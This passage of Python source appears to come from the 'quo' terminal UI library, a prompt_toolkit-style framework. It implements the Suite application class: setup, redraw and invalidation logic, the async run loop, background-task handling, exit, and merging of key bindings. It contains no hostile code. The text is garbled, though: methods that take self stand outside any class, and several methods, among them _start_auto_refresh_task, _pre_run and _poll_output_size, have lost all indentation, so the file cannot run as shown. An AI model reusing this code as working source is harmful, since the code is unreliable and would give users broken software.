:param on_invalidate: Called when the UI has been invalidated.
:param before_render: Called right before rendering.
:param after_render: Called right after rendering.
I/O:
(Note that the preferred way to change the input/output is by creating an
`AppSession` with the required input/output objects. If you need multiple
applications running at the same time, you have to create a separate
`AppSession` using a `with create_app_session():` block.
:param input: :class:`~quo.input.Input` instance.
:param output: :class:`~quo.output.Output` instance. (Probably
Vt100_Output or Win32Output.)
Usage:
app = Suite(...)
app.run()
# Or
await app.run_async()
"""
    def __init__(
        self,
        layout: Optional[Layout] = None,
        style: Optional[BaseStyle] = None,
        include_default_pygments_style: FilterOrBool = True,
        style_transformation: Optional[StyleTransformation] = None,
        key_bindings: Optional[KeyBindingsBase] = None,
        clipboard: Optional[Clipboard] = None,
        full_screen: bool = False,
        color_depth: Union[
            ColorDepth, Callable[[], Union[ColorDepth, None]], None
        ] = None,
        mouse_support: FilterOrBool = False,
        enable_page_navigation_bindings: Optional[
            FilterOrBool
        ] = None,  # Can be None, True or False.
        paste_mode: FilterOrBool = False,
        editing_mode: EditingMode = EditingMode.EMACS,
        erase_when_done: bool = False,
        reverse_vi_search_direction: FilterOrBool = False,
        min_redraw_interval: Union[float, int, None] = None,
        max_render_postpone_time: Union[float, int, None] = 0.01,
        refresh_interval: Optional[float] = None,
        terminal_size_polling_interval: Optional[float] = 0.5,
        on_reset: Optional[onSuite] = None,
        on_invalidate: Optional[onSuite] = None,
        before_render: Optional[onSuite] = None,
        after_render: Optional[onSuite] = None,
        # I/O.
        input: Optional[Input] = None,
        output: Optional[Output] = None,
    ) -> None:
        """Initialize the application. See the class docstring for parameter documentation."""
        # If `enable_page_navigation_bindings` is not specified, enable it in
        # case of full screen applications only. This can be overridden by the user.
        if enable_page_navigation_bindings is None:
            enable_page_navigation_bindings = Condition(lambda: self.full_screen)
        # Normalize all FilterOrBool parameters to real Filter objects.
        paste_mode = to_filter(paste_mode)
        mouse_support = to_filter(mouse_support)
        reverse_vi_search_direction = to_filter(reverse_vi_search_direction)
        enable_page_navigation_bindings = to_filter(enable_page_navigation_bindings)
        include_default_pygments_style = to_filter(include_default_pygments_style)
        if layout is None:
            layout = create_dummy_layout()
        if style_transformation is None:
            style_transformation = DummyStyleTransformation()
        self.style = style
        self.style_transformation = style_transformation
        # Key bindings.
        self.key_bindings = key_bindings
        self._default_bindings = load_key_bindings()
        self._page_navigation_bindings = load_page_navigation_bindings()
        self.layout = layout
        self.clipboard = clipboard or InMemoryClipboard()
        self.full_screen: bool = full_screen
        self._color_depth = color_depth
        self.mouse_support = mouse_support
        self.paste_mode = paste_mode
        self.editing_mode = editing_mode
        self.erase_when_done = erase_when_done
        self.reverse_vi_search_direction = reverse_vi_search_direction
        self.enable_page_navigation_bindings = enable_page_navigation_bindings
        self.min_redraw_interval = min_redraw_interval
        self.max_render_postpone_time = max_render_postpone_time
        self.refresh_interval = refresh_interval
        self.terminal_size_polling_interval = terminal_size_polling_interval
        # Events.
        self.on_invalidate = Event(self, on_invalidate)
        self.on_reset = Event(self, on_reset)
        self.before_render = Event(self, before_render)
        self.after_render = Event(self, after_render)
        # I/O. Fall back to the ambient AppSession's input/output when not given.
        session = get_app_session()
        self.output = output or session.output
        self.input = input or session.input
        # List of 'extra' functions to execute before a Suite.run.
        self.pre_run_callables: List[Callable[[], None]] = []
        self._is_running = False
        self.future: Optional[Future[_AppResult]] = None
        self.loop: Optional[AbstractEventLoop] = None
        self.context: Optional[contextvars.Context] = None
        #: Quoted insert. This flag is set if we go into quoted insert mode.
        self.quoted_insert = False
        #: Vi state. (For Vi key bindings.)
        self.vi_state = ViState()
        self.emacs_state = EmacsState()
        #: When to flush the input (For flushing escape keys.) This is important
        #: on terminals that use vt100 input. We can't distinguish the escape
        #: key from for instance the left-arrow key, if we don't know what follows
        #: after "\x1b". This little timer will consider "\x1b" to be escape if
        #: nothing did follow in this time span.
        #: This seems to work like the `ttimeoutlen` option in Vim.
        self.ttimeoutlen = 0.5  # Seconds.
        #: Like Vim's `timeoutlen` option. This can be `None` or a float. For
        #: instance, suppose that we have a key binding AB and a second key
        #: binding A. If the uses presses A and then waits, we don't handle
        #: this binding yet (unless it was marked 'eager'), because we don't
        #: know what will follow. This timeout is the maximum amount of time
        #: that we wait until we call the handlers anyway. Pass `None` to
        #: disable this timeout.
        self.timeoutlen = 1.0
        #: The `Renderer` instance.
        # Make sure that the same stdout is used, when a custom renderer has been passed.
        self._merged_style = self._create_merged_style(include_default_pygments_style)
        self.renderer = Renderer(
            self._merged_style,
            self.output,
            full_screen=full_screen,
            mouse_support=mouse_support,
            cpr_not_supported_callback=self.cpr_not_supported_callback,
        )
        #: Render counter. This one is increased every time the UI is rendered.
        #: It can be used as a key for caching certain information during one
        #: rendering.
        self.render_counter = 0
        # Invalidate flag. When 'True', a repaint has been scheduled.
        self._invalidated = False
        self._invalidate_events: List[
            Event[object]
        ] = []  # Collection of 'invalidate' Event objects.
        self._last_redraw_time = 0.0  # Unix timestamp of last redraw. Used when
        # `min_redraw_interval` is given.
        #: The `InputProcessor` instance.
        self.key_processor = KeyProcessor(_CombinedRegistry(self))
        # If `run_in_terminal` was called. This will point to a `Future` what will be
        # set at the point when the previous run finishes.
        self._running_in_terminal = False
        self._running_in_terminal_f: Optional[Future[None]] = None
        # Trigger initialize callback.
        self.reset()
def _create_merged_style(self, include_default_pygments_style: Filter) -> BaseStyle:
    """
    Build the effective style: the default UI style at the bottom, then
    (conditionally) the default Pygments style, then the user style on top.
    """
    no_style = DummyStyle()
    pygments = default_pygments_style()

    @DynamicStyle
    def pygments_if_enabled() -> BaseStyle:
        # Evaluated on every use, so the filter can flip at runtime.
        return pygments if include_default_pygments_style() else no_style

    layers = [
        default_ui_style(),
        pygments_if_enabled,
        DynamicStyle(lambda: self.style),
    ]
    return merge_styles(layers)
@property
def color_depth(self) -> ColorDepth:
    """
    The active :class:`.ColorDepth`.

    Resolution order: an explicitly configured depth (possibly provided as
    a callable) wins; otherwise fall back to the depth reported by the
    :class:`.Output` implementation (which, for outputs built via
    `output.defaults.create_output`, comes from the
    $PROMPT_TOOLKIT_COLOR_DEPTH environment variable).
    """
    configured = self._color_depth
    resolved = configured() if callable(configured) else configured
    if resolved is None:
        resolved = self.output.get_default_color_depth()
    return resolved
@property
def current_buffer(self) -> Buffer:
    """
    The currently focused :class:`~.Buffer`.

    When no real buffer has the focus, a throwaway dummy buffer is
    returned instead, so callers never have to deal with `None`.
    """
    focused = self.layout.current_buffer
    if focused:
        return focused
    return Buffer(name="dummy-buffer")  # Dummy buffer.
@property
def current_search_state(self) -> SearchState:
    """
    The :class:`.SearchState` of the focused :class:`.BufferControl`.

    A fresh dummy state is returned when something else has focus, so
    callers never receive `None`.
    """
    focused_control = self.layout.current_control
    if not isinstance(focused_control, BufferControl):
        return SearchState()  # Dummy search state. (Don't return None!)
    return focused_control.search_state
def reset(self) -> None:
    """
    Reset everything, for reading the next input.

    Called at the start of every `run`; resets renderer, key processor,
    layout and editing-mode state, fires `on_reset`, and repairs the focus
    if the focused control is not focusable.
    """
    # Notice that we don't reset the buffers. (This happens just before
    # returning, and when we have multiple buffers, we clearly want the
    # content in the other buffers to remain unchanged between several
    # calls of `run`. (And the same is true for the focus stack.)
    self.exit_style = ""
    # Tasks started through `create_background_task`; cancelled on exit.
    self.background_tasks: List[Task[None]] = []
    self.renderer.reset()
    self.key_processor.reset()
    self.layout.reset()
    self.vi_state.reset()
    self.emacs_state.reset()
    # Trigger reset event.
    self.on_reset.fire()
    # Make sure that we have a 'focusable' widget focused.
    # (The `Layout` class can't determine this.)
    layout = self.layout
    if not layout.current_control.is_focusable():
        for w in layout.find_all_windows():
            if w.content.is_focusable():
                layout.current_window = w
                break
def invalidate(self) -> None:
    """
    Thread safe way of sending a repaint trigger to the input event loop.

    Repaints are coalesced: while one is pending (`self._invalidated`),
    further calls are no-ops. When `min_redraw_interval` is set, the
    repaint is additionally delayed so redraws never happen more often
    than that interval.
    """
    if not self._is_running:
        return
    # `invalidate()` called if we don't have a loop yet (not running?), or
    # after the event loop was closed.
    if self.loop is None or self.loop.is_closed():
        return
    # Never schedule a second redraw, when a previous one has not yet been
    # executed. (This should protect against other threads calling
    # 'invalidate' many times, resulting in 100% CPU.)
    if self._invalidated:
        return
    else:
        self._invalidated = True
    # Trigger event.
    self.loop.call_soon_threadsafe(self.on_invalidate.fire)

    def redraw() -> None:
        # Clear the flag first, so a new invalidate() during rendering
        # schedules another repaint.
        self._invalidated = False
        self._redraw()

    def schedule_redraw() -> None:
        call_soon_threadsafe(
            redraw, max_postpone_time=self.max_render_postpone_time, loop=self.loop
        )

    if self.min_redraw_interval:
        # When a minimum redraw interval is set, wait minimum this amount
        # of time between redraws.
        diff = time.time() - self._last_redraw_time
        if diff < self.min_redraw_interval:

            async def redraw_in_future() -> None:
                await sleep(cast(float, self.min_redraw_interval) - diff)
                schedule_redraw()

            self.loop.call_soon_threadsafe(
                lambda: self.create_background_task(redraw_in_future())
            )
        else:
            schedule_redraw()
    else:
        schedule_redraw()
@property
def invalidated(self) -> bool:
    """True when a redraw operation has been scheduled but not executed yet."""
    return self._invalidated
def _redraw(self, render_as_done: bool = False) -> None:
    """
    Render the command line again. (Not thread safe!) (From other threads,
    or if unsure, use :meth:`.Suite.invalidate`.)

    :param render_as_done: make sure to put the cursor after the UI
        (the final render when the application finishes).
    """

    def run_in_context() -> None:
        # Only draw when no sub application was started.
        if self._is_running and not self._running_in_terminal:
            if self.min_redraw_interval:
                self._last_redraw_time = time.time()
            # Render
            self.render_counter += 1
            self.before_render.fire()
            if render_as_done:
                if self.erase_when_done:
                    self.renderer.erase()
                else:
                    # Draw in 'done' state and reset renderer.
                    self.renderer.render(self, self.layout, is_done=render_as_done)
            else:
                self.renderer.render(self, self.layout)
            self.layout.update_parents_relations()
            # Fire render event.
            self.after_render.fire()
            # Re-subscribe to the invalidate events of whatever controls
            # are visible after this render.
            self._update_invalidate_events()

    # NOTE: We want to make sure this Suite is the active one. The
    # invalidate function is often called from a context where this
    # application is not the active one. (Like the
    # `PromptSession._auto_refresh_context`).
    # We copy the context in case the context was already active, to
    # prevent RuntimeErrors. (The rendering is not supposed to change
    # any context variables.)
    if self.context is not None:
        self.context.copy().run(run_in_context)
def _start_auto_refresh_task(self) -> None:
"""
Start a while/true loop in the background for automatic invalidation of
the UI.
"""
if self.refresh_interval is not None and self.refresh_interval != 0:
async def auto_refresh(refresh_interval: float) -> None:
while True:
await sleep(refresh_interval)
self.invalidate()
self.create_background_task(auto_refresh(self.refresh_interval))
def _update_invalidate_events(self) -> None:
"""
Make sure to attach 'invalidate' handlers to all invalidate events in
the UI.
"""
# Remove all the original event handlers. (Components can be removed
# from the UI.)
for ev in self._invalidate_events:
ev -= self._invalidate_handler
# Gather all new events.
# (All controls are able to invalidate themselves.)
def gather_events() -> Iterable[Event[object]]:
for c in self.layout.find_all_controls():
for ev in c.get_invalidate_events():
yield ev
self._invalidate_events = list(gather_events())
for ev in self._invalidate_events:
ev += self._invalidate_handler
def _invalidate_handler(self, sender: object) -> None:
"""
Handler for invalidate events coming from UIControls.
(This handles the difference in signature between event handler and
`self.invalidate`. It also needs to be a method -not a nested
function-, so that we can remove it again .)
"""
self.invalidate()
def _on_resize(self) -> None:
    """
    When the window size changes, we erase the current output and request
    again the cursor position. When the CPR answer arrives, the output is
    drawn again.
    """
    # Erase, request position (when cursor is at the start position)
    # and redraw again. -- The order is important: the CPR request must be
    # sent while the cursor sits at the start of the (erased) output.
    self.renderer.erase(leave_alternate_screen=False)
    self._request_absolute_cursor_position()
    self._redraw()
def _pre_run(self, pre_run: Optional[Callable[[], None]] = None) -> None:
"""
Called during `run`.
`self.future` should be set to the new future at the point where this
is called in order to avoid data races. `pre_run` can be used to set a
`threading.Event` to synchronize with UI termination code, running in
another thread that would call `Suite.exit`. (See the progress
bar code for an example.)
"""
if pre_run:
pre_run()
# Process registered "pre_run_callables" and clear list.
for c in self.pre_run_callables:
c()
del self.pre_run_callables[:]
async def run_async(
    self,
    pre_run: Optional[Callable[[], None]] = None,
    set_exception_handler: bool = True,
) -> _AppResult:
    """
    Run the quo :class:`~quo.application.Suite`
    until :meth:`~quo.application.Suite.exit` has been
    called. Return the value that was passed to
    :meth:`~quo.application.Suite.exit`.

    This is the main entry point for a prompt_toolkit
    :class:`~quo.application.Suite` and usually the only
    place where the event loop is actually running.

    :param pre_run: Optional callable, which is called right after the
        "reset" of the application.
    :param set_exception_handler: When set, in case of an exception, go out
        of the alternate screen and hide the application, display the
        exception, and wait for the user to press ENTER.
    :raises AssertionError: when the application is already running.
    """
    assert not self._is_running, "Suite is already running."

    async def _run_async() -> _AppResult:
        "Coroutine: one complete UI session (reset, input loop, teardown)."
        loop = get_event_loop()
        f = loop.create_future()
        self.future = f  # XXX: make sure to set this before calling '_redraw'.
        self.loop = loop
        self.context = contextvars.copy_context()

        # Counter for cancelling 'flush' timeouts. Every time when a key is
        # pressed, we start a 'flush' timer for flushing our escape key. But
        # when any subsequent input is received, a new timer is started and
        # the current timer will be ignored.
        flush_task: Optional[asyncio.Task[None]] = None

        # Reset.
        # (`self.future` needs to be set when `pre_run` is called.)
        self.reset()
        self._pre_run(pre_run)

        # Feed type ahead input first.
        self.key_processor.feed_multiple(get_typeahead(self.input))
        self.key_processor.process_keys()

        def read_from_input() -> None:
            nonlocal flush_task

            # Ignore when we aren't running anymore. This callback will
            # removed from the loop next time. (It could be that it was
            # still in the 'tasks' list of the loop.)
            # Except: if we need to process incoming CPRs.
            if not self._is_running and not self.renderer.waiting_for_cpr:
                return

            # Get keys from the input object.
            keys = self.input.read_keys()

            # Feed to key processor.
            self.key_processor.feed_multiple(keys)
            self.key_processor.process_keys()

            # Quit when the input stream was closed.
            if self.input.closed:
                if not f.done():
                    f.set_exception(EOFError)
            else:
                # Automatically flush keys.
                # (Restarting the timer: cancel the previous flush task so
                # only the most recent keypress schedules a flush.)
                if flush_task:
                    flush_task.cancel()
                flush_task = self.create_background_task(auto_flush_input())

        async def auto_flush_input() -> None:
            # Flush input after timeout.
            # (Used for flushing the enter key.)
            # This sleep can be cancelled, in that case we won't flush yet.
            await sleep(self.ttimeoutlen)
            flush_input()

        def flush_input() -> None:
            if not self.is_done:
                # Get keys, and feed to key processor.
                keys = self.input.flush_keys()
                self.key_processor.feed_multiple(keys)
                self.key_processor.process_keys()

                if self.input.closed:
                    f.set_exception(EOFError)

        # Enter raw mode, attach input and attach WINCH event handler.
        with self.input.raw_mode(), self.input.attach(
            read_from_input
        ), attach_winch_signal_handler(self._on_resize):
            # Fallback size polling (for non-main threads / Windows).
            self.create_background_task(self._poll_output_size())

            # Draw UI.
            self._request_absolute_cursor_position()
            self._redraw()
            self._start_auto_refresh_task()

            # Wait for UI to finish.
            try:
                result = await f
            finally:
                # In any case, when the application finishes.
                # (Successful, or because of an error.)
                try:
                    self._redraw(render_as_done=True)
                finally:
                    # _redraw has a good chance to fail if it calls widgets
                    # with bad code. Make sure to reset the renderer
                    # anyway.
                    self.renderer.reset()

                    # Unset `is_running`, this ensures that possibly
                    # scheduled draws won't paint during the following
                    # yield.
                    self._is_running = False

                    # Detach event handlers for invalidate events.
                    # (Important when a UIControl is embedded in multiple
                    # applications, like ptterm in pymux. An invalidate
                    # should not trigger a repaint in terminated
                    # applications.)
                    for ev in self._invalidate_events:
                        ev -= self._invalidate_handler
                    self._invalidate_events = []

                    # Wait for CPR responses.
                    if self.output.responds_to_cpr:
                        await self.renderer.wait_for_cpr_responses()

                    # Wait for the run-in-terminals to terminate.
                    previous_run_in_terminal_f = self._running_in_terminal_f

                    if previous_run_in_terminal_f:
                        await previous_run_in_terminal_f

                    # Store unprocessed input as typeahead for next time.
                    store_typeahead(self.input, self.key_processor.empty_queue())

        return result

    async def _run_async2() -> _AppResult:
        # Outer wrapper: manages `_is_running`, the active-app context and
        # the loop's exception handler around one `_run_async` session.
        self._is_running = True

        # Make sure to set `_invalidated` to `False` to begin with,
        # otherwise we're not going to paint anything. This can happen if
        # this application had run before on a different event loop, and a
        # paint was scheduled using `call_soon_threadsafe` with
        # `max_postpone_time`.
        self._invalidated = False

        loop = get_event_loop()
        if set_exception_handler:
            previous_exc_handler = loop.get_exception_handler()
            loop.set_exception_handler(self._handle_exception)

        try:
            with set_app(self):
                try:
                    result = await _run_async()
                finally:
                    # Wait for the background tasks to be done. This needs to
                    # go in the finally! If `_run_async` raises
                    # `KeyboardInterrupt`, we still want to wait for the
                    # background tasks.
                    await self.cancel_and_wait_for_background_tasks()

                    # Set the `_is_running` flag to `False`. Normally this
                    # happened already in the finally block in `run_async`
                    # above, but in case of exceptions, that's not always the
                    # case.
                    self._is_running = False

                    # Also remove the Future again. (This brings the
                    # application back to its initial state, where it also
                    # doesn't have a Future.)
                    self.future = None

            return result
        finally:
            if set_exception_handler:
                loop.set_exception_handler(previous_exc_handler)

    return await _run_async2()
def run(
    self,
    pre_run: Optional[Callable[[], None]] = None,
    set_exception_handler: bool = True,
    in_thread: bool = False,
) -> _AppResult:
    """
    A blocking 'run' call that waits until the UI is finished.

    This will start the current asyncio event loop. If no loop is set for
    the current thread, then it will create a new loop. If a new loop was
    created, this won't close the new loop (if `in_thread=False`).

    :param pre_run: Optional callable, which is called right after the
        "reset" of the application.
    :param set_exception_handler: When set, in case of an exception, go out
        of the alternate screen and hide the application, display the
        exception, and wait for the user to press ENTER.
    :param in_thread: When true, run the application in a background
        thread, and block the current thread until the application
        terminates. This is useful if we need to be sure the application
        won't use the current event loop (asyncio does not support nested
        event loops). A new event loop will be created in this background
        thread, and that loop will also be closed when the background
        thread terminates. When this is used, it's especially important to
        make sure that all asyncio background tasks are managed through
        `get_app().create_background_task()`, so that unfinished tasks are
        properly cancelled before the event loop is closed. This is used
        for instance in ptpython.
    """
    if in_thread:
        result: _AppResult
        exception: Optional[BaseException] = None

        def run_in_thread() -> None:
            nonlocal result, exception
            try:
                result = self.run(
                    pre_run=pre_run, set_exception_handler=set_exception_handler
                )
            except BaseException as e:
                exception = e
            finally:
                # Make sure to close the event loop in this thread. Running
                # the application creates a new loop (because we're in
                # another thread), but it doesn't get closed automatically
                # (also not by the garbage collector).
                loop = get_event_loop()
                loop.run_until_complete(loop.shutdown_asyncgens())
                loop.close()

        thread = threading.Thread(target=run_in_thread)
        thread.start()
        thread.join()

        if exception is not None:
            raise exception
        return result

    # We don't create a new event loop by default, because we want to be
    # sure that when this is called multiple times, each call of `run()`
    # goes through the same event loop. This way, users can schedule
    # background-tasks that keep running across multiple prompts.
    try:
        loop = get_event_loop()
    except RuntimeError:
        # Possibly we are not running in the main thread, where no event
        # loop is set by default. Or somebody called `asyncio.run()`
        # before, which closes the existing event loop. We can create a new
        # loop.
        loop = new_event_loop()
        set_event_loop(loop)

    return loop.run_until_complete(
        self.run_async(pre_run=pre_run, set_exception_handler=set_exception_handler)
    )
def _handle_exception(
    self, loop: AbstractEventLoop, context: Dict[str, Any]
) -> None:
    """
    Handler for event loop exceptions: print the exception (and its
    traceback) via `run_in_terminal`, then wait for the user to press ENTER.
    """
    # Grab the traceback here, while we're still in the 'except:' block of
    # the event loop where it's available. The 'in_term' coroutine runs
    # later, when the exception context would be gone.
    tb = get_traceback_from_context(context)
    formatted_tb = "".join(format_tb(tb))

    async def in_term() -> None:
        async with in_terminal():
            # Print output. Similar to 'loop.default_exception_handler',
            # but don't use logger.
            # (Fixed: the three fragments previously rendered as
            # "Unhandled exceptionin the event loop:" — missing space.)
            echo("Unhandled ", nl=False)
            echo("exception", fg="black", bg="yellow", nl=False)
            echo(" in the event loop:")
            echo(formatted_tb)
            print("Exception %s" % (context.get("exception"),))
            await _do_wait_for_enter("Press ENTER to continue...")

    ensure_future(in_term())
def create_background_task(
    self, coroutine: Awaitable[None]
) -> "asyncio.Task[None]":
    """
    Schedule `coroutine` as a task on the running loop and track it, so it
    gets cancelled when the `Suite` terminates.

    (With Trio-style nurseries, this would be a task spawned in a nursery
    opened by `Suite.run_async`.)

    Not threadsafe.
    """
    new_task = get_event_loop().create_task(coroutine)
    self.background_tasks.append(new_task)
    return new_task
async def cancel_and_wait_for_background_tasks(self) -> None:
    """
    Cancel every tracked background task, then await each one so the
    cancellations actually complete. A task that raised something other
    than `CancelledError` has that exception propagated here.

    (The Trio-nursery equivalent would be the nursery's `__aexit__`.)
    """
    tasks = self.background_tasks
    for pending in tasks:
        pending.cancel()
    for pending in tasks:
        try:
            await pending
        except CancelledError:
            continue
async def _poll_output_size(self) -> None:
"""
Coroutine for polling the terminal dimensions.
Useful for situations where `attach_winch_signal_handler` is not sufficient:
- If we are not running in the main thread.
- On Windows.
"""
size: Optional[Size] = None
interval = self.terminal_size_polling_interval
if interval is None:
return
while True:
await asyncio.sleep(interval)
new_size = self.output.get_size()
if size is not None and new_size != size:
self._on_resize()
size = new_size
def cpr_not_supported_callback(self) -> None:
    """
    Called when the terminal never answered our cursor position request.
    Prints a warning, unless the output already reports that it doesn't
    support CPR.
    """
    if not self.output.responds_to_cpr:
        return  # Already known; nothing to warn about.

    def warn() -> None:
        self.output.write(
            "WARNING: your terminal doesn't support cursor position requests (CPR).\r\n"
        )
        self.output.flush()

    run_in_terminal(warn)
@overload
def exit(self) -> None:
    "Exit without arguments."

@overload
def exit(self, *, result: _AppResult, style: str = "") -> None:
    "Exit with `_AppResult`."

@overload
def exit(
    self, *, exception: Union[BaseException, Type[BaseException]], style: str = ""
) -> None:
    "Exit with exception."

def exit(
    self,
    result: Optional[_AppResult] = None,
    exception: Optional[Union[BaseException, Type[BaseException]]] = None,
    style: str = "",
) -> None:
    """
    Exit application.

    .. note::

        If `Suite.exit` is called before `Suite.run()` is
        called, then the `Suite` won't exit (because the
        `Suite.future` doesn't correspond to the current run). Use a
        `pre_run` hook and an event to synchronize the closing if there's a
        chance this can happen.

    :param result: Set this result for the application.
    :param exception: Set this exception as the result for an application. For
        a prompt, this is often `EOFError` or `KeyboardInterrupt`.
    :param style: Apply this style on the whole content when quitting,
        often this is 'class:exiting' for a prompt. (Used when
        `erase_when_done` is not set.)
    :raises Exception: when the application is not running, or when a
        result/exception was already set for this run.
    """
    # `result` and `exception` are mutually exclusive.
    assert result is None or exception is None

    if self.future is None:
        raise Exception("Suite is not running. Suite.exit() failed.")

    if self.future.done():
        raise Exception("Return value already set. Suite.exit() failed.")

    self.exit_style = style

    if exception is not None:
        self.future.set_exception(exception)
    else:
        self.future.set_result(cast(_AppResult, result))
def _request_absolute_cursor_position(self) -> None:
"""
Send CPR request.
"""
# Note: only do this if the input queue is not empty, and a return
# value has not been set. Otherwise, we won't be able to read the
# response anyway.
if not self.key_processor.input_queue and not self.is_done:
self.renderer.request_absolute_cursor_position()
async def run_system_command(
    self,
    command: str,
    wait_for_enter: bool = True,
    display_before_text: AnyFormattedText = "",
    wait_text: str = "Press ENTER to continue...",
) -> None:
    """
    Run a shell command while the prompt is hidden; when it finishes, all
    its output scrolls above the prompt.

    :param command: Shell command to be executed.
    :param wait_for_enter: Wait for the user to press enter, when the
        command is finished.
    :param display_before_text: If given, text to be displayed before the
        command executes.
    :param wait_text: Message shown while waiting for enter.
    """
    async with in_terminal():
        # Prefer the application's own input/output file descriptors;
        # fall back to the process's stdin/stdout when they expose none.
        try:
            stdin_fd = self.input.fileno()
        except AttributeError:
            stdin_fd = sys.stdin.fileno()
        try:
            stdout_fd = self.output.fileno()
        except AttributeError:
            stdout_fd = sys.stdout.fileno()

        def run_command() -> None:
            # Show the optional banner, then block until the command ends.
            self.print_text(display_before_text)
            process = Popen(command, shell=True, stdin=stdin_fd, stdout=stdout_fd)
            process.wait()

        await run_in_executor_with_context(run_command)

        # Wait for the user to press enter.
        if wait_for_enter:
            await _do_wait_for_enter(wait_text)
def suspend_to_background(self, suspend_group: bool = True) -> None:
    """
    (Not thread safe -- to be called from inside the key bindings.)
    Suspend this process by sending it SIGTSTP, returning control to the
    shell until the user resumes it.

    :param suspend_group: When true, suspend the whole process group (the
        default; this also covers the case where input is piped in from
        another process).
    """
    # Only suspend when the operating system supports it (not on Windows).
    if _SIGTSTP is None:
        return

    def send_sigtstp() -> None:
        # pid 0 targets the whole process group; otherwise just this process.
        target = 0 if suspend_group else os.getpid()
        os.kill(target, _SIGTSTP)

    run_in_terminal(send_sigtstp)
def print_text(
    self, text: AnyFormattedText, style: Optional[BaseStyle] = None
) -> None:
    """
    Print a list of (style_str, text) tuples to the output.

    (While the UI is running this must be routed through `run_in_terminal`,
    otherwise it destroys the rendered UI.)

    :param text: List of ``(style_str, text)`` tuples.
    :param style: Style to use; defaults to the application's merged style.
    """
    effective_style = style or self._merged_style
    print_formatted_text(
        output=self.output,
        formatted_text=text,
        style=effective_style,
        color_depth=self.color_depth,
        style_transformation=self.style_transformation,
    )
@property
def is_running(self) -> bool:
    """`True` while the application is currently active/running."""
    return self._is_running
@property
def is_done(self) -> bool:
    """`True` once this run's future has a result or exception set."""
    future = self.future
    return future.done() if future else False
def get_used_style_strings(self) -> List[str]:
    """
    Return the style strings the renderer has seen so far, whitespace
    normalized and sorted. Helpful for debugging, and for writing a new
    `Style`.
    """
    attrs_for_style = self.renderer._attrs_for_style
    if not attrs_for_style:
        return []
    normalized = (
        re.sub(r"\s+", " ", style_str).strip()
        for style_str in attrs_for_style
    )
    return sorted(normalized)
class _CombinedRegistry(KeyBindingsBase):
    """
    The `KeyBindings` of key bindings for a `Suite`.
    This merges the global key bindings with those of the currently focused
    user control.
    """

    def __init__(self, app: Suite[_AppResult]) -> None:
        self.app = app
        # Cache of merged bindings, keyed by the focused window plus the
        # frozen set of all visible controls.
        self._cache: SimpleCache[
            Tuple[Window, FrozenSet[UIControl]], KeyBindingsBase
        ] = SimpleCache()

    @property
    def _version(self) -> Hashable:
        """Not needed - this object is not going to be wrapped in another
        KeyBindings object."""
        raise NotImplementedError

    def bindings(self) -> List[Binding]:
        """Not needed - this object is not going to be wrapped in another
        KeyBindings object."""
        raise NotImplementedError

    def _create_key_bindings(
        self, current_window: Window, other_controls: List[UIControl]
    ) -> KeyBindingsBase:
        """
        Create a `KeyBindings` object that merges the `KeyBindings` from the
        `UIControl` with all the parent controls and the global key bindings.
        """
        key_bindings = []
        collected_containers = set()

        # Collect key bindings from currently focused control and all parent
        # controls. Don't include key bindings of container parent controls.
        # Walking stops at a modal container or at the layout root.
        container: Container = current_window
        while True:
            collected_containers.add(container)
            kb = container.get_key_bindings()
            if kb is not None:
                key_bindings.append(kb)
            if container.is_modal():
                break
            parent = self.app.layout.get_parent(container)
            if parent is None:
                break
            else:
                container = parent

        # Include global bindings (starting at the top-most container).
        for c in walk(container):
            if c not in collected_containers:
                kb = c.get_key_bindings()
                if kb is not None:
                    key_bindings.append(GlobalOnlyKeyBindings(kb))

        # Add App key bindings
        if self.app.key_bindings:
            key_bindings.append(self.app.key_bindings)

        # Add mouse bindings.
        key_bindings.append(
            ConditionalKeyBindings(
                self.app._page_navigation_bindings,
                self.app.enable_page_navigation_bindings,
            )
        )
        key_bindings.append(self.app._default_bindings)

        # Reverse this list. The current control's key bindings should come
        # last. They need priority.
        key_bindings = key_bindings[::-1]

        return merge_key_bindings(key_bindings)

    @property
    def _key_bindings(self) -> KeyBindingsBase:
        # Recomputed (via the cache) whenever the focused window or the set
        # of visible controls changes.
        current_window = self.app.layout.current_window
        other_controls = list(self.app.layout.find_all_controls())
        key = current_window, frozenset(other_controls)

        return self._cache.get(
            key, lambda: self._create_key_bindings(current_window, other_controls)
        )

    def get_bindings_for_keys(self, keys: KeysTuple) -> List[Binding]:
        """Return all bindings that exactly match `keys`."""
        return self._key_bindings.get_bindings_for_keys(keys)

    def get_bindings_starting_with_keys(self, keys: KeysTuple) -> List[Binding]:
        """Return all bindings whose key sequence starts with `keys`."""
        return self._key_bindings.get_bindings_starting_with_keys(keys)
async def _do_wait_for_enter(wait_text: AnyFormattedText) -> None:
    """
    Run a tiny sub application that does nothing but wait for ENTER.

    Compared to 'input'/'raw_input', this:
    - shares the same input/output I/O;
    - doesn't block the event loop.
    """
    from quo.shortcuts import Prompt
    from quo.keys import KeyBinder

    bindings = KeyBinder()

    @bindings.add("enter")
    def _accept(event: E) -> None:
        event.app.exit()

    @bindings.add(Keys.Any)
    def _swallow(event: E) -> None:
        "Disallow typing."

    session: Prompt[None] = Prompt(
        text=wait_text, key_bindings=bindings
    )
    await session.app.run_async()
@contextmanager
def attach_winch_signal_handler(
    handler: Callable[[], None]
) -> Generator[None, None, None]:
    """
    Attach the given callback as a WINCH signal handler within the context
    manager. Restore the original signal handler when done.

    The `Suite.run` method will register SIGWINCH, so that it will
    properly repaint when the terminal window resizes. However, using
    `run_in_terminal`, we can temporarily send an application to the
    background, and run an other app in between, which will then overwrite the
    SIGWINCH. This is why it's important to restore the handler when the app
    terminates.
    """
    # The tricky part here is that signals are registered in the Unix event
    # loop with a wakeup fd, but another application could have registered
    # signals using signal.signal directly. For now, the implementation is
    # hard-coded for the `asyncio.unix_events._UnixSelectorEventLoop`.

    # No WINCH? Then don't do anything.
    # (SIGWINCH doesn't exist on Windows; signal handlers can only be
    # installed from the main thread.)
    sigwinch = getattr(signal, "SIGWINCH", None)
    if sigwinch is None or not in_main_thread():
        yield
        return

    # Keep track of the previous handler.
    # (Only UnixSelectorEventloop has `_signal_handlers`.)
    loop = asyncio.get_event_loop()
    previous_winch_handler = getattr(loop, "_signal_handlers", {}).get(sigwinch)

    try:
        loop.add_signal_handler(sigwinch, handler)
        yield
    finally:
        # Restore the previous signal handler.
        # NOTE(review): re-registration reads the private `_callback` /
        # `_args` attributes of asyncio's Handle — fragile across versions.
        loop.remove_signal_handler(sigwinch)
        if previous_winch_handler is not None:
            loop.add_signal_handler(
                sigwinch,
                previous_winch_handler._callback,
                *previous_winch_handler._args,
            )
